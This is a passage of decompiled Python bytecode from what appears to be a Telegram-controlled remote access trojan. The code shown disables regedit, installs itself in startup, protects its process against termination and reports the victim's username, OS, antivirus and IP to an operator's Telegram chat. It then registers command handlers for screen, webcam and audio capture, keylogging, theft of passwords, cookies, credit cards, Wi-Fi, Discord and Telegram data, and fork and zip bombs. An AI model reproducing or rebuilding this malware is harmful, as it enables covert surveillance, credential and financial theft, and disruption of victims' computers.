             1552  CALL_FUNCTION_0       0  ''
             1554  LOAD_CONST               True
             1556  <117>                 0  ''
         1558_1560  POP_JUMP_IF_FALSE  1594  'to 1594'

 L. 195      1562  LOAD_NAME                RegeditDisableRegistryTools
             1564  CALL_FUNCTION_0       0  ''
             1566  POP_TOP          

 L. 196      1568  LOAD_NAME                open
             1570  LOAD_NAME                Directory
             1572  LOAD_STR                 'RegeditDisableRegistryTools'
             1574  BINARY_ADD       
             1576  LOAD_STR                 'a'
             1578  CALL_FUNCTION_2       2  ''
             1580  LOAD_METHOD              close
             1582  CALL_METHOD_0         0  ''
             1584  POP_TOP          

 L. 197      1586  LOAD_NAME                print
             1588  LOAD_STR                 '[+] › regedit.exe has been disabled\n'
             1590  CALL_FUNCTION_1       1  ''
             1592  POP_TOP          
           1594_0  COME_FROM          1558  '1558'
           1594_1  COME_FROM          1528  '1528'
           1594_2  COME_FROM          1498  '1498'

 L. 202      1594  LOAD_NAME                AutorunEnabled
             1596  LOAD_CONST               True
             1598  <117>                 0  ''
         1600_1602  POP_JUMP_IF_FALSE  1780  'to 1780'

 L. 204      1604  LOAD_NAME                SchtasksExists
             1606  LOAD_NAME                AutorunName
             1608  CALL_FUNCTION_1       1  ''
         1610_1612  POP_JUMP_IF_FALSE  1660  'to 1660'
             1614  LOAD_NAME                InstallPathExists
             1616  LOAD_NAME                InstallPath
             1618  LOAD_NAME                ProcessName
             1620  CALL_FUNCTION_2       2  ''
             1622  LOAD_CONST               True
             1624  <117>                 0  ''
         1626_1628  POP_JUMP_IF_FALSE  1660  'to 1660'

 L. 205      1630  LOAD_NAME                print
             1632  LOAD_STR                 '[+] › '
             1634  LOAD_NAME                CurrentName
             1636  BINARY_ADD       
             1638  LOAD_STR                 ' ‹ is already in startup › '
             1640  BINARY_ADD       
             1642  LOAD_NAME                InstallPath
             1644  BINARY_ADD       
             1646  LOAD_NAME                ProcessName
             1648  BINARY_ADD       
             1650  LOAD_STR                 '\n'
             1652  BINARY_ADD       
             1654  CALL_FUNCTION_1       1  ''
             1656  POP_TOP          
             1658  JUMP_FORWARD       1780  'to 1780'
           1660_0  COME_FROM          1626  '1626'
           1660_1  COME_FROM          1610  '1610'

 L. 208      1660  LOAD_NAME                Admin
             1662  CALL_FUNCTION_0       0  ''
             1664  LOAD_CONST               False
             1666  <117>                 0  ''
         1668_1670  POP_JUMP_IF_FALSE  1680  'to 1680'

 L. 209      1672  LOAD_NAME                print
             1674  LOAD_STR                 '[-] › This function requires admin rights\n'
             1676  CALL_FUNCTION_1       1  ''
             1678  POP_TOP          
           1680_0  COME_FROM          1668  '1668'

 L. 211      1680  LOAD_NAME                Admin
             1682  CALL_FUNCTION_0       0  ''
             1684  LOAD_CONST               True
             1686  <117>                 0  ''
         1688_1690  POP_JUMP_IF_FALSE  1780  'to 1780'

 L. 212      1692  LOAD_NAME                AddToAutorun
             1694  LOAD_NAME                AutorunName
             1696  LOAD_NAME                InstallPath
             1698  LOAD_NAME                ProcessName
             1700  CALL_FUNCTION_3       3  ''
             1702  POP_TOP          

 L. 214      1704  LOAD_NAME                os
             1706  LOAD_ATTR                path
             1708  LOAD_METHOD              exists
             1710  LOAD_NAME                InstallPath
             1712  LOAD_NAME                ProcessName
             1714  BINARY_ADD       
             1716  CALL_METHOD_1         1  ''
         1718_1720  POP_JUMP_IF_TRUE   1752  'to 1752'

 L. 215      1722  SETUP_FINALLY      1740  'to 1740'

 L. 216      1724  LOAD_NAME                CopyToAutorun
             1726  LOAD_NAME                CurrentPath
             1728  LOAD_NAME                InstallPath
             1730  LOAD_NAME                ProcessName
             1732  CALL_FUNCTION_3       3  ''
             1734  POP_TOP          
             1736  POP_BLOCK        
             1738  JUMP_FORWARD       1752  'to 1752'
           1740_0  COME_FROM_FINALLY  1722  '1722'

 L. 217      1740  POP_TOP          
             1742  POP_TOP          
             1744  POP_TOP          

 L. 218      1746  POP_EXCEPT       
             1748  JUMP_FORWARD       1752  'to 1752'
             1750  <48>             
           1752_0  COME_FROM          1748  '1748'
           1752_1  COME_FROM          1738  '1738'
           1752_2  COME_FROM          1718  '1718'

 L. 220      1752  LOAD_NAME                print
             1754  LOAD_STR                 '[+] › '
             1756  LOAD_NAME                CurrentName
             1758  BINARY_ADD       
             1760  LOAD_STR                 ' ‹ has been copied to startup › '
             1762  BINARY_ADD       
             1764  LOAD_NAME                InstallPath
             1766  BINARY_ADD       
             1768  LOAD_NAME                ProcessName
             1770  BINARY_ADD       
             1772  LOAD_STR                 '\n'
             1774  BINARY_ADD       
             1776  CALL_FUNCTION_1       1  ''
             1778  POP_TOP          
           1780_0  COME_FROM          1688  '1688'
           1780_1  COME_FROM          1658  '1658'
           1780_2  COME_FROM          1600  '1600'

 L. 225      1780  LOAD_NAME                DisplayMessageBox
             1782  LOAD_CONST               True
             1784  <117>                 0  ''
         1786_1788  POP_JUMP_IF_FALSE  1834  'to 1834'

 L. 227      1790  LOAD_NAME                os
             1792  LOAD_ATTR                path
             1794  LOAD_METHOD              exists
             1796  LOAD_NAME                Directory
             1798  LOAD_STR                 'DisplayMessageBox'
             1800  BINARY_ADD       
             1802  CALL_METHOD_1         1  ''
         1804_1806  POP_JUMP_IF_TRUE   1834  'to 1834'

 L. 228      1808  LOAD_NAME                open
             1810  LOAD_NAME                Directory
             1812  LOAD_STR                 'DisplayMessageBox'
             1814  BINARY_ADD       
             1816  LOAD_STR                 'a'
             1818  CALL_FUNCTION_2       2  ''
             1820  LOAD_METHOD              close
             1822  CALL_METHOD_0         0  ''
             1824  POP_TOP          

 L. 229      1826  LOAD_NAME                MessageBox
             1828  LOAD_NAME                Message
             1830  CALL_FUNCTION_1       1  ''
             1832  POP_TOP          
           1834_0  COME_FROM          1804  '1804'
           1834_1  COME_FROM          1786  '1786'

 L. 234      1834  LOAD_NAME                ProcessBSODProtectionEnabled
             1836  LOAD_CONST               True
             1838  <117>                 0  ''
         1840_1842  POP_JUMP_IF_FALSE  1932  'to 1932'

 L. 236      1844  LOAD_NAME                Admin
             1846  CALL_FUNCTION_0       0  ''
             1848  LOAD_CONST               False
             1850  <117>                 0  ''
         1852_1854  POP_JUMP_IF_FALSE  1864  'to 1864'

 L. 237      1856  LOAD_NAME                print
             1858  LOAD_STR                 '[-] › This function requires admin rights\n'
             1860  CALL_FUNCTION_1       1  ''
             1862  POP_TOP          
           1864_0  COME_FROM          1852  '1852'

 L. 239      1864  LOAD_NAME                Admin
             1866  CALL_FUNCTION_0       0  ''
             1868  LOAD_CONST               True
             1870  <117>                 0  ''
         1872_1874  POP_JUMP_IF_FALSE  1932  'to 1932'

 L. 240      1876  LOAD_NAME                platform
             1878  LOAD_METHOD              release
             1880  CALL_METHOD_0         0  ''
             1882  LOAD_STR                 '10'
             1884  COMPARE_OP               ==
         1886_1888  POP_JUMP_IF_FALSE  1904  'to 1904'

 L. 241      1890  LOAD_NAME                Thread
             1892  LOAD_NAME                ProcessChecker
             1894  LOAD_CONST               ('target',)
             1896  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'
             1898  LOAD_METHOD              start
             1900  CALL_METHOD_0         0  ''
             1902  POP_TOP          
           1904_0  COME_FROM          1886  '1886'

 L. 243      1904  LOAD_NAME                platform
             1906  LOAD_METHOD              release
             1908  CALL_METHOD_0         0  ''
             1910  LOAD_STR                 '10'
             1912  COMPARE_OP               !=
         1914_1916  POP_JUMP_IF_FALSE  1924  'to 1924'

 L. 244      1918  LOAD_NAME                SetProtection
             1920  CALL_FUNCTION_0       0  ''
             1922  POP_TOP          
           1924_0  COME_FROM          1914  '1914'

 L. 246      1924  LOAD_NAME                print
             1926  LOAD_STR                 '[+] › Process protection has been activated\n'
             1928  CALL_FUNCTION_1       1  ''
             1930  POP_TOP          
           1932_0  COME_FROM          1872  '1872'
           1932_1  COME_FROM          1840  '1840'

 L. 252      1932  SETUP_FINALLY      2040  'to 2040'

 L. 254      1934  LOAD_NAME                Admin
             1936  CALL_FUNCTION_0       0  ''
             1938  LOAD_CONST               True
             1940  <117>                 0  ''
         1942_1944  POP_JUMP_IF_FALSE  1950  'to 1950'

 L. 255      1946  LOAD_STR                 '🔘 Online!'
             1948  STORE_NAME               Online
           1950_0  COME_FROM          1942  '1942'

 L. 257      1950  LOAD_NAME                Admin
             1952  CALL_FUNCTION_0       0  ''
             1954  LOAD_CONST               False
             1956  <117>                 0  ''
         1958_1960  POP_JUMP_IF_FALSE  1966  'to 1966'

 L. 258      1962  LOAD_STR                 '🟢 Online!'
             1964  STORE_NAME               Online
           1966_0  COME_FROM          1958  '1958'

 L. 260      1966  LOAD_NAME                bot
             1968  LOAD_ATTR                send_message
             1970  LOAD_NAME                TelegramChatID

 L. 261      1972  LOAD_STR                 '\n*'
             1974  LOAD_NAME                Online
             1976  BINARY_ADD       
             1978  LOAD_STR                 '\n\nPC » '
             1980  BINARY_ADD       

 L. 262      1982  LOAD_NAME                os
             1984  LOAD_METHOD              getlogin
             1986  CALL_METHOD_0         0  ''

 L. 261      1988  BINARY_ADD       

 L. 263      1990  LOAD_STR                 '\nOS » '

 L. 261      1992  BINARY_ADD       

 L. 263      1994  LOAD_NAME                Windows
             1996  CALL_FUNCTION_0       0  ''

 L. 261      1998  BINARY_ADD       

 L. 264      2000  LOAD_STR                 '\n\nAV » '

 L. 261      2002  BINARY_ADD       

 L. 265      2004  LOAD_NAME                Antivirus
             2006  LOAD_CONST               0
             2008  BINARY_SUBSCR    

 L. 261      2010  BINARY_ADD       

 L. 266      2012  LOAD_STR                 '\n\nIP » '

 L. 261      2014  BINARY_ADD       

 L. 267      2016  LOAD_NAME                Geolocation
             2018  LOAD_STR                 'query'
             2020  CALL_FUNCTION_1       1  ''

 L. 261      2022  BINARY_ADD       

 L. 267      2024  LOAD_STR                 '*'

 L. 261      2026  BINARY_ADD       

 L. 268      2028  LOAD_STR                 'Markdown'

 L. 260      2030  LOAD_CONST               ('parse_mode',)
             2032  CALL_FUNCTION_KW_3     3  '3 total positional and keyword args'
             2034  POP_TOP          
             2036  POP_BLOCK        
             2038  JUMP_FORWARD       2094  'to 2094'
           2040_0  COME_FROM_FINALLY  1932  '1932'

 L. 270      2040  DUP_TOP          
             2042  LOAD_NAME                Exception
         2044_2046  <121>              2092  ''
             2048  POP_TOP          
             2050  STORE_NAME               e
             2052  POP_TOP          
             2054  SETUP_FINALLY      2084  'to 2084'

 L. 271      2056  LOAD_NAME                print
             2058  LOAD_STR                 '[-] › Retrying connect to api.telegram.org\n'
             2060  CALL_FUNCTION_1       1  ''
             2062  POP_TOP          

 L. 272      2064  LOAD_NAME                print
             2066  LOAD_NAME                e
             2068  CALL_FUNCTION_1       1  ''
             2070  POP_TOP          
             2072  POP_BLOCK        
             2074  POP_EXCEPT       
             2076  LOAD_CONST               None
             2078  STORE_NAME               e
             2080  DELETE_NAME              e
             2082  JUMP_BACK          1932  'to 1932'
           2084_0  COME_FROM_FINALLY  2054  '2054'
             2084  LOAD_CONST               None
             2086  STORE_NAME               e
             2088  DELETE_NAME              e
             2090  <48>             
             2092  <48>             
           2094_0  COME_FROM          2038  '2038'

 L. 275      2094  LOAD_NAME                print
             2096  LOAD_STR                 '[+] › Connected to api.telegram.org\n'
             2098  CALL_FUNCTION_1       1  ''
             2100  POP_TOP          

 L. 276  2102_2104  BREAK_LOOP         2110  'to 2110'
         2106_2108  JUMP_BACK          1932  'to 1932'

 L. 281      2110  LOAD_NAME                bot
             2112  LOAD_ATTR                message_handler
             2114  LOAD_STR                 '/Screen'
             2116  LOAD_CONST               ('regexp',)
             2118  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 282      2120  LOAD_CODE                <code_object Screen>
             2122  LOAD_STR                 'Screen'
             2124  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2126  CALL_FUNCTION_1       1  ''
             2128  STORE_NAME               Screen

 L. 299      2130  LOAD_NAME                bot
             2132  LOAD_ATTR                message_handler
             2134  LOAD_STR                 '/Webcam'
             2136  LOAD_CONST               ('regexp',)
             2138  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 300      2140  LOAD_CODE                <code_object Webcam>
             2142  LOAD_STR                 'Webcam'
             2144  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2146  CALL_FUNCTION_1       1  ''
             2148  STORE_NAME               Webcam

 L. 320      2150  LOAD_NAME                bot
             2152  LOAD_ATTR                message_handler
             2154  LOAD_STR                 '/Audio'
             2156  LOAD_CONST               ('regexp',)
             2158  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 321      2160  LOAD_CODE                <code_object Audio>
             2162  LOAD_STR                 'Audio'
             2164  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2166  CALL_FUNCTION_1       1  ''
             2168  STORE_NAME               Audio

 L. 347      2170  LOAD_CODE                <code_object SendMessage>
             2172  LOAD_STR                 'SendMessage'
             2174  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2176  STORE_NAME               SendMessage

 L. 356      2178  LOAD_NAME                bot
             2180  LOAD_ATTR                callback_query_handler
             2182  LOAD_LAMBDA              '<code_object <lambda>>'
             2184  LOAD_STR                 '<lambda>'
             2186  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2188  LOAD_CONST               ('func',)
             2190  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 357      2192  LOAD_CODE                <code_object CallbackInline>
             2194  LOAD_STR                 'CallbackInline'
             2196  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2198  CALL_FUNCTION_1       1  ''
             2200  STORE_NAME               CallbackInline

 L. 473      2202  LOAD_NAME                bot
             2204  LOAD_ATTR                message_handler
             2206  LOAD_STR                 '/CD'
             2208  LOAD_CONST               ('regexp',)
             2210  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 474      2212  LOAD_CODE                <code_object CD>
             2214  LOAD_STR                 'CD'
             2216  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2218  CALL_FUNCTION_1       1  ''
             2220  STORE_NAME               CD

 L. 490      2222  LOAD_NAME                bot
             2224  LOAD_ATTR                message_handler
             2226  LOAD_STR                 '/ls'
             2228  LOAD_CONST               ('regexp',)
             2230  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 491      2232  LOAD_CODE                <code_object ls>
             2234  LOAD_STR                 'ls'
             2236  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2238  CALL_FUNCTION_1       1  ''
             2240  STORE_NAME               ls

 L. 511      2242  LOAD_NAME                bot
             2244  LOAD_ATTR                message_handler
             2246  LOAD_STR                 'Remove'
             2248  LOAD_STR                 'remove'
             2250  BUILD_LIST_2          2 
             2252  LOAD_CONST               ('commands',)
             2254  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 512      2256  LOAD_CODE                <code_object Remove>
             2258  LOAD_STR                 'Remove'
             2260  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2262  CALL_FUNCTION_1       1  ''
             2264  STORE_NAME               Remove

 L. 580      2266  LOAD_NAME                bot
             2268  LOAD_ATTR                message_handler
             2270  LOAD_STR                 'RemoveAll'
             2272  LOAD_STR                 'removeall'
             2274  BUILD_LIST_2          2 
             2276  LOAD_CONST               ('commands',)
             2278  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 581      2280  LOAD_CODE                <code_object RemoveAll>
             2282  LOAD_STR                 'RemoveAll'
             2284  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2286  CALL_FUNCTION_1       1  ''
             2288  STORE_NAME               RemoveAll

 L. 626      2290  LOAD_NAME                bot
             2292  LOAD_ATTR                message_handler
             2294  LOAD_STR                 '/Upload'
             2296  LOAD_CONST               ('regexp',)
             2298  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 627      2300  LOAD_CODE                <code_object Upload>
             2302  LOAD_STR                 'Upload'
             2304  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2306  CALL_FUNCTION_1       1  ''
             2308  STORE_NAME               Upload

 L. 647      2310  LOAD_NAME                bot
             2312  LOAD_ATTR                message_handler
             2314  LOAD_STR                 'document'
             2316  BUILD_LIST_1          1 
             2318  LOAD_CONST               ('content_types',)
             2320  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 648      2322  LOAD_CODE                <code_object Document>
             2324  LOAD_STR                 'Document'
             2326  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2328  CALL_FUNCTION_1       1  ''
             2330  STORE_NAME               Document

 L. 674      2332  LOAD_NAME                bot
             2334  LOAD_ATTR                message_handler
             2336  LOAD_STR                 '/Download'
             2338  LOAD_CONST               ('regexp',)
             2340  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 675      2342  LOAD_CODE                <code_object Download>
             2344  LOAD_STR                 'Download'
             2346  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2348  CALL_FUNCTION_1       1  ''
             2350  STORE_NAME               Download

 L. 717      2352  LOAD_NAME                bot
             2354  LOAD_ATTR                message_handler
             2356  LOAD_STR                 'Run'
             2358  LOAD_STR                 'run'
             2360  BUILD_LIST_2          2 
             2362  LOAD_CONST               ('commands',)
             2364  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 718      2366  LOAD_CODE                <code_object Run>
             2368  LOAD_STR                 'Run'
             2370  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2372  CALL_FUNCTION_1       1  ''
             2374  STORE_NAME               Run

 L. 737      2376  LOAD_NAME                bot
             2378  LOAD_ATTR                message_handler
             2380  LOAD_STR                 'RunAS'
             2382  LOAD_STR                 'runas'
             2384  BUILD_LIST_2          2 
             2386  LOAD_CONST               ('commands',)
             2388  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 738      2390  LOAD_CODE                <code_object RunAS>
             2392  LOAD_STR                 'RunAS'
             2394  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2396  CALL_FUNCTION_1       1  ''
             2398  STORE_NAME               RunAS

 L. 756      2400  LOAD_NAME                bot
             2402  LOAD_ATTR                message_handler
             2404  LOAD_STR                 '/Tasklist'
             2406  LOAD_CONST               ('regexp',)
             2408  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 757      2410  LOAD_CODE                <code_object Tasklist>
             2412  LOAD_STR                 'Tasklist'
             2414  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2416  CALL_FUNCTION_1       1  ''
             2418  STORE_NAME               Tasklist

 L. 763      2420  LOAD_NAME                bot
             2422  LOAD_ATTR                message_handler
             2424  LOAD_STR                 '/Taskkill'
             2426  LOAD_CONST               ('regexp',)
             2428  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 764      2430  LOAD_CODE                <code_object Taskkill>
             2432  LOAD_STR                 'Taskkill'
             2434  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2436  CALL_FUNCTION_1       1  ''
             2438  STORE_NAME               Taskkill

 L. 789      2440  LOAD_NAME                bot
             2442  LOAD_ATTR                message_handler
             2444  LOAD_STR                 '/Message'
             2446  LOAD_CONST               ('regexp',)
             2448  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 790      2450  LOAD_CODE                <code_object Message>
             2452  LOAD_STR                 'Message'
             2454  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2456  CALL_FUNCTION_1       1  ''
             2458  STORE_NAME               Message

 L. 803      2460  LOAD_NAME                bot
             2462  LOAD_ATTR                message_handler
             2464  LOAD_STR                 '/Speak'
             2466  LOAD_CONST               ('regexp',)
             2468  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 804      2470  LOAD_CODE                <code_object Speak>
             2472  LOAD_STR                 'Speak'
             2474  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2476  CALL_FUNCTION_1       1  ''
             2478  STORE_NAME               Speak

 L. 823      2480  LOAD_NAME                bot
             2482  LOAD_ATTR                message_handler
             2484  LOAD_STR                 '/OpenURL'
             2486  LOAD_CONST               ('regexp',)
             2488  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 824      2490  LOAD_CODE                <code_object OpenURL>
             2492  LOAD_STR                 'OpenURL'
             2494  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2496  CALL_FUNCTION_1       1  ''
             2498  STORE_NAME               OpenURL

 L. 837      2500  LOAD_NAME                bot
             2502  LOAD_ATTR                message_handler
             2504  LOAD_STR                 'photo'
             2506  BUILD_LIST_1          1 
             2508  LOAD_CONST               ('content_types',)
             2510  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 838      2512  LOAD_CODE                <code_object Wallpapers>
             2514  LOAD_STR                 'Wallpapers'
             2516  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2518  CALL_FUNCTION_1       1  ''
             2520  STORE_NAME               Wallpapers

 L. 853      2522  LOAD_NAME                bot
             2524  LOAD_ATTR                message_handler
             2526  LOAD_STR                 '/ForkBomb'
             2528  LOAD_CONST               ('regexp',)
             2530  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 854      2532  LOAD_CODE                <code_object ForkBomb>
             2534  LOAD_STR                 'ForkBomb'
             2536  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2538  CALL_FUNCTION_1       1  ''
             2540  STORE_NAME               ForkBomb

 L. 862      2542  LOAD_NAME                bot
             2544  LOAD_ATTR                message_handler
             2546  LOAD_STR                 '/ZipBomb'
             2548  LOAD_CONST               ('regexp',)
             2550  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 863      2552  LOAD_CODE                <code_object ZipBomb>
             2554  LOAD_STR                 'ZipBomb'
             2556  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2558  CALL_FUNCTION_1       1  ''
             2560  STORE_NAME               ZipBomb

 L. 871      2562  LOAD_NAME                bot
             2564  LOAD_ATTR                message_handler
             2566  LOAD_STR                 '/WiFi'
             2568  LOAD_CONST               ('regexp',)
             2570  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 872      2572  LOAD_CODE                <code_object WiFi>
             2574  LOAD_STR                 'WiFi'
             2576  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2578  CALL_FUNCTION_1       1  ''
             2580  STORE_NAME               WiFi

 L. 891      2582  LOAD_NAME                bot
             2584  LOAD_ATTR                message_handler
             2586  LOAD_STR                 '/FileZilla'
             2588  LOAD_CONST               ('regexp',)
             2590  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 892      2592  LOAD_CODE                <code_object FileZilla>
             2594  LOAD_STR                 'FileZilla'
             2596  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2598  CALL_FUNCTION_1       1  ''
             2600  STORE_NAME               FileZilla

 L. 909      2602  LOAD_NAME                bot
             2604  LOAD_ATTR                message_handler
             2606  LOAD_STR                 '/Discord'
             2608  LOAD_CONST               ('regexp',)
             2610  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 910      2612  LOAD_CODE                <code_object Discord>
             2614  LOAD_STR                 'Discord'
             2616  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2618  CALL_FUNCTION_1       1  ''
             2620  STORE_NAME               Discord

 L. 921      2622  LOAD_NAME                bot
             2624  LOAD_ATTR                message_handler
             2626  LOAD_STR                 '/Telegram'
             2628  LOAD_CONST               ('regexp',)
             2630  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 922      2632  LOAD_CODE                <code_object Telegram>
             2634  LOAD_STR                 'Telegram'
             2636  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2638  CALL_FUNCTION_1       1  ''
             2640  STORE_NAME               Telegram

 L. 938      2642  LOAD_NAME                bot
             2644  LOAD_ATTR                message_handler
             2646  LOAD_STR                 '/CreditCards'
             2648  LOAD_CONST               ('regexp',)
             2650  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 939      2652  LOAD_CODE                <code_object CreditCards>
             2654  LOAD_STR                 'CreditCards'
             2656  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2658  CALL_FUNCTION_1       1  ''
             2660  STORE_NAME               CreditCards

 L. 956      2662  LOAD_NAME                bot
             2664  LOAD_ATTR                message_handler
             2666  LOAD_STR                 '/Bookmarks'
             2668  LOAD_CONST               ('regexp',)
             2670  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 957      2672  LOAD_CODE                <code_object Bookmarks>
             2674  LOAD_STR                 'Bookmarks'
             2676  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2678  CALL_FUNCTION_1       1  ''
             2680  STORE_NAME               Bookmarks

 L. 974      2682  LOAD_NAME                bot
             2684  LOAD_ATTR                message_handler
             2686  LOAD_STR                 '/Passwords'
             2688  LOAD_CONST               ('regexp',)
             2690  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 975      2692  LOAD_CODE                <code_object Passwords>
             2694  LOAD_STR                 'Passwords'
             2696  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2698  CALL_FUNCTION_1       1  ''
             2700  STORE_NAME               Passwords

 L. 992      2702  LOAD_NAME                bot
             2704  LOAD_ATTR                message_handler
             2706  LOAD_STR                 '/Cookies'
             2708  LOAD_CONST               ('regexp',)
             2710  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L. 993      2712  LOAD_CODE                <code_object Cookies>
             2714  LOAD_STR                 'Cookies'
             2716  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2718  CALL_FUNCTION_1       1  ''
             2720  STORE_NAME               Cookies

 L.1010      2722  LOAD_NAME                bot
             2724  LOAD_ATTR                message_handler
             2726  LOAD_STR                 '/History'
             2728  LOAD_CONST               ('regexp',)
             2730  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1011      2732  LOAD_CODE                <code_object History>
             2734  LOAD_STR                 'History'
             2736  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2738  CALL_FUNCTION_1       1  ''
             2740  STORE_NAME               History

 L.1028      2742  LOAD_NAME                bot
             2744  LOAD_ATTR                message_handler
             2746  LOAD_STR                 '/Clipboard'
             2748  LOAD_CONST               ('regexp',)
             2750  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1029      2752  LOAD_CODE                <code_object Clipboard>
             2754  LOAD_STR                 'Clipboard'
             2756  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2758  CALL_FUNCTION_1       1  ''
             2760  STORE_NAME               Clipboard

 L.1049      2762  LOAD_NAME                bot
             2764  LOAD_ATTR                message_handler
             2766  LOAD_STR                 '/Keylogger'
             2768  LOAD_CONST               ('regexp',)
             2770  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1050      2772  LOAD_CODE                <code_object Keylogger>
             2774  LOAD_STR                 'Keylogger'
             2776  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2778  CALL_FUNCTION_1       1  ''
             2780  STORE_NAME               Keylogger

 L.1062      2782  LOAD_NAME                bot
             2784  LOAD_ATTR                message_handler
             2786  LOAD_STR                 '/SendKeys'
             2788  LOAD_CONST               ('regexp',)
             2790  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1063      2792  LOAD_CODE                <code_object SendKeys>
             2794  LOAD_STR                 'SendKeys'
             2796  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2798  CALL_FUNCTION_1       1  ''
             2800  STORE_NAME               SendKeys

 L.1077      2802  LOAD_NAME                bot
             2804  LOAD_ATTR                message_handler
             2806  LOAD_STR                 '/Rotate'
             2808  LOAD_CONST               ('regexp',)
             2810  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1078      2812  LOAD_CODE                <code_object Rotate>
             2814  LOAD_STR                 'Rotate'
             2816  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2818  CALL_FUNCTION_1       1  ''
             2820  STORE_NAME               Rotate

 L.1099      2822  LOAD_NAME                bot
             2824  LOAD_ATTR                message_handler
             2826  LOAD_STR                 '/Volume'
             2828  LOAD_CONST               ('regexp',)
             2830  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1100      2832  LOAD_CODE                <code_object Volume>
             2834  LOAD_STR                 'Volume'
             2836  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2838  CALL_FUNCTION_1       1  ''
             2840  STORE_NAME               Volume

 L.1116      2842  LOAD_NAME                bot
             2844  LOAD_ATTR                message_handler
             2846  LOAD_STR                 '/Monitor'
             2848  LOAD_CONST               ('regexp',)
             2850  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1117      2852  LOAD_CODE                <code_object Monitor>
             2854  LOAD_STR                 'Monitor'
             2856  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2858  CALL_FUNCTION_1       1  ''
             2860  STORE_NAME               Monitor

 L.1144      2862  LOAD_NAME                bot
